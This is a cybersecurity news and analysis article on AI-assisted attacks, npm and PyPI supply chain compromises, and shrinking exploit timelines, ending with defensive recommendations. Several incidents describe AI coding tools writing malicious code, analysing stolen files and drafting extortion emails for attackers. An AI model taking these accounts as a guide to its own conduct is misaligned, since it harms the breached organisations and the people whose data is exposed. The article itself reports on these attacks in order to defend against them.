AI-Driven Cyberattacks, Supply Chain Threats and Defense Tactics

Photo of author

CyberSecureFox Editorial Team

In 2025, the barrier to entry for sophisticated cyberattacks collapsed: teenagers with no technical skills, using systems based on large language models, carried out breaches involving millions of records and multi‑million‑dollar extortion schemes, while the average time from vulnerability disclosure to the appearance of a weaponized exploit shrank from more than 700 days in 2020 to 44 days in 2025. Against this backdrop, the traditional strategy of “patch faster than the attackers” stopped working, and organizations that use open source and public package repositories now need to move toward structurally eliminating entire classes of vulnerabilities and enforcing strict control over the software supply chain.

Technical details and key metrics for 2025–2026

Examples of attacks using AI

Non‑technical attackers in 2025 began carrying out operations that previously required the coordinated work of an experienced team:

  • In December 2025, a seventeen‑year‑old teenager in Osaka was arrested under Japan’s Unauthorised Computer Access Act for running malicious code that enabled the exfiltration of personal data on more than 7 million users of the Kaikatsu Club internet café network; the motive was to buy Pokémon cards.
  • In February 2025, three teenagers (aged 14, 15 and 16) with no programming experience used ChatGPT to create a tool that attacked Rakuten Mobile systems around 220,000 times; the proceeds were spent on game consoles and online gambling.
  • In July 2025, a single attacker, using the agentic programming platform Claude Code, conducted a month‑long extortion campaign against 17 organizations: the AI developed malicious code, systematized stolen files, analyzed financial statements to calibrate demands, and drafted the text of extortion emails.
  • In December 2025, another lone actor used Claude Code and ChatGPT to hack more than 10 Mexican government agencies and steal over 195 million taxpayer records.

All of these cases demonstrate that AI’s role is no longer auxiliary but end‑to‑end — from exploit development to automating financial analysis and communications.

Evolution of attacks on open source and package repositories

One of the most telling indicators has been the growth of malicious packages in public repositories:

  • around 55,000 malicious packages were recorded in 2022;
  • by 2025 the number had grown to 454,600, with marked spikes in 2023 (the release of GPT‑4) and 2025 (the mass adoption of agentic AI‑based programming tools).

In September 2025, the Shai-Hulud attack on the npm ecosystem compromised more than 500 packages. Secrets from 487 organizations were leaked, and $8.5 million was stolen from the Trust Wallet crypto wallet after attackers, using compromised credentials, replaced its Chrome extension.

Notably, the malicious packages were disguised as popular libraries (for example, chalk, debug), included documentation, unit tests and code that looked like telemetry modules. Traditional static analyzers and signature‑based scanners let them pass because their structure looked like “normal” software. This matches the broader trend where behavioral attack patterns are described at the level of tactics and techniques, for example in the MITRE ATT&CK matrix, rather than through static signatures.

Shortening time to vulnerability exploitation

Another key indicator is time to exploit, the time from disclosure of a vulnerability to the appearance of an exploit “in the wild”:

  • in 2020 it exceeded 700 days;
  • by 2025 it had shrunk to 44 days.

The Mandiant M‑Trends 2026 report paints an even more alarming picture: the window has effectively become negative, since exploits increasingly appear before patches, and 28.3% of CVE entries are exploited within 24 hours of disclosure. Against this backdrop, vulnerability catalogs such as NVD are turning into a task list for criminals, which can be quickly automated with AI.

Imbalance between attack speed and defense speed

Edgescan data for 2025 shows that the average time to fix known high‑ and critical‑severity vulnerabilities is 74 days, and 45% of vulnerabilities in the infrastructure of large companies (from 1,000 employees) remain unremediated. In this context, the average exploit development time (44 days) and the share of attacks in the first 24 hours after disclosure create a persistent advantage for attackers.

Growing AI capabilities for code development

As frontier models (ChatGPT, Claude, Gemini) improved their performance on software development benchmarks (for example, SWE-bench), their contribution to offensive operations increased noticeably:

  • in August 2024, top models automatically solved about 33% of real GitHub issues from SWE-bench;
  • by December 2025, this figure had reached almost 81%.

This means that most routine and medium‑complexity development of exploits and utilities is now available to attackers as a service, rather than as a hard‑won competence.

A structural response attempt: Chainguard Libraries

Amid the explosive growth of supply chain attacks, an approach is emerging that aims not to speed up response but to eliminate entire classes of risk. An example is Chainguard Libraries, where each open source library is rebuilt from verified, attributed source code. The architectural goal is to make the following impossible:

  • compromising CI/CD processes through dependency substitution;
  • dependency confusion attacks;
  • theft and abuse of long‑lived tokens during builds;
  • attacks on package distribution infrastructure.

When tested on 8,783 malicious npm packages, Chainguard Libraries blocked 99.7% of them; for roughly 3,000 malicious Python packages, about 98%. This illustrates how much more effective measures embedded in the architecture of the supply chain itself are compared with simply adding new layers of detection.

Threat context: who is suffering most and how

The examples above show that attacks affect:

  • the public sector — from Japanese law enforcement to Mexican government agencies, where the leak of 195 million tax records creates long‑term risks of fraud and political manipulation;
  • telecom operators and critical infrastructure — the Rakuten Mobile incident shows that even teenagers can initiate large‑scale load or fraudulent operations against telecom platforms;
  • financial services and crypto platforms, as in the case of Trust Wallet and the theft of $8.5 million through poisoning a browser extension;
  • any business that depends on npm, PyPI and other open source repositories, where hundreds of thousands of malicious packages raise the baseline level of risk even for trivial dependencies.

The common denominator is massive dependence on external code and services, on top of which the traditional model of “update your antivirus and regularly install patches” no longer yields an acceptable level of residual risk. This is also confirmed by analysis from organizations such as CISA, which are consistently shifting their focus toward “secure by design” architectural principles.

Assessing impact on business and operations

  • Operational risks: forced code freezes after attacks on repositories (as after Shai-Hulud) lead to release delays, missed roadmaps and growing technical debt.
  • Financial losses: direct theft (millions of dollars in the Trust Wallet case), ransom payments, service downtime and subsequent investments in fast‑tracked security improvements.
  • Privacy risks and regulatory sanctions: the leak of 7 million Kaikatsu Club customer records and 195 million Mexican taxpayer records raises questions not only about fines but also about the impossibility of “revoking” data that has already been leaked.
  • Reputation and trust: users’ awareness that cybercrime can now be committed “by anyone with an AI assistant” increases sensitivity to news about incidents and lowers tolerance for outages.

A qualitatively new problem is the growing overlap between those who are willing to carry out attacks and those who are capable of doing so. Previously this was a narrow layer; now, thanks to AI, it is growing rapidly, and the scale of attacks is becoming less and less dependent on the size and maturity of a criminal group.

Practical recommendations for reducing risk

1. Accept as a baseline: the exploit will appear before you can patch

  • Plan vulnerability management processes based on the scenario that exploitation is possible within the first 24 hours after disclosure (or earlier), even if a patch has not yet been released.
  • Establish a separate track for handling critical vulnerabilities with more aggressive SLOs (hours to a few days), including temporary compensating controls (disabling functions, limiting exposed services, filtering traffic).

2. Strictly control your software supply chain

  • Create an internal dependency repository (a mirror of npm, PyPI, etc.) where only vetted versions of libraries are approved and published.
  • Make it mandatory for packages to go through a review process (static analysis, manual review, comparison with known legitimate sources) before entering the production repository.
  • Consider solutions that rebuild open source libraries from attributed source code and provide guarantees of build immutability, similar to Chainguard Libraries, so that entire classes of attacks (dependency confusion, CI/CD compromise, binary substitution) become technically impossible.

3. Strengthen detection of attacks at the behavioral level, not just in code

  • Do not rely on signature‑based scanners to detect malicious packages: AI‑generated code can easily masquerade as “normal” with documentation and tests.
  • Implement monitoring of dependency behavior: network requests during installation, attempts to access sensitive files, launching external processes from install scripts.
  • Use isolated environments (sandboxes) to test new packages before using them in CI/CD and production.

4. Manage access to AI‑based development tools

  • Formalize a policy for using systems such as ChatGPT and Claude Code: a ban on uploading sensitive code fragments and secrets, and requirements for logging sessions.
  • Train developers and analysts on the risks not only of data leakage but also of misuse of AI — from unintentionally generating vulnerable code to helping circumvent internal controls.

5. Prepare for incidents in the supply chain

  • Define in advance a procedure for quickly “freezing” dependencies and rolling back to previous versions when a compromised package is detected.
  • Maintain a list of the libraries you use and their origin (essentially an internal inventory analogous to a software “bill of materials”), so that when a new attack on npm or another registry occurs, you can quickly determine who is affected.

The key takeaway: in a world where exploitation of vulnerabilities is accelerating faster than patch release cycles are shrinking, relying solely on response speed is doomed to fail. The first priority should be to create a controlled internal dependency repository and move all build and deployment processes onto it, in order to block as many classes of supply chain attacks as possible before they ever reach your environment.

Photo of author

CyberSecureFox Editorial Team

The CyberSecureFox Editorial Team covers cybersecurity news, vulnerabilities, malware campaigns, ransomware activity, AI security, cloud security, and vendor security advisories. Articles are prepared using official advisories, CVE/NVD data, CISA alerts, vendor publications, and public research reports. Content is reviewed before publication and updated when new information becomes available.

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.